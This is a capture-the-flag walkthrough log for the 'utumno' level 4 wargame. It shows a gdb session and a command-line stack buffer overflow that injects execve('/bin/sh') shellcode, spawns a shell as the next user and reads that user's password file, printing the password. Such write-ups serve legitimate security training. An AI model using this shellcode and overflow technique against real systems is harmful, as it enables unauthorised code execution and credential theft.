utumno - 4

root@today:~/Desktop/misc/utumno/utumno4# ssh utumno4@178.79.134.250
utumno4@melinda:~$ cd /tmp/utu4
utumno4@melinda:/tmp/utu4$ gdb -tui /utumno/utumno4
(gdb) layout asm
(gdb) b *main+108
Breakpoint 1 at 0x80484c9: file utumno4.c, line 36.
(gdb) run 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xff\xff\xff\xff" + "U" * 238'`
Starting program: /games/utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xff\xff\xff\xff" + "U" * 238'`
Breakpoint 1, main (argc=1431655765, argv=0x55555555) at utumno4.c:36
(gdb) x/8dbx $esp+0x1e
0xfffdd6ce:     0x6a    0x0b    0x58    0x31    0xf6    0x56    0x68    0x2f

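# Inside gdb the dump above puts the start of the buffer at 0xfffdd6ce. Outside gdb the stack is laid out slightly differently (the environment and the program path differ), so the buffer address there is 0xfffdd6de or 0xfffdd6be.
# Note: a hard-coded stack address only works here because stack addresses are apparently not randomised on this host and the stack is executable; ASLR and a non-executable stack would stop this.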

utumno4@melinda:/tmp/utu4$ /utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xce\xd6\xfd\xff" + "U" * 238'`
Segmentation fault
utumno4@melinda:/tmp/utu4$ /utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xbe\xd6\xfd\xff" + "U" * 238'`
Illegal instruction
utumno4@melinda:/tmp/utu4$ /utumno/utumno4 65536 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "U" * 65270 + "\xde\xd6\xfd\xff" + "U" * 238'`
$ whoami
utumno5
$ cat /etc/utumno_pass/utumno5
woucaejiek
$

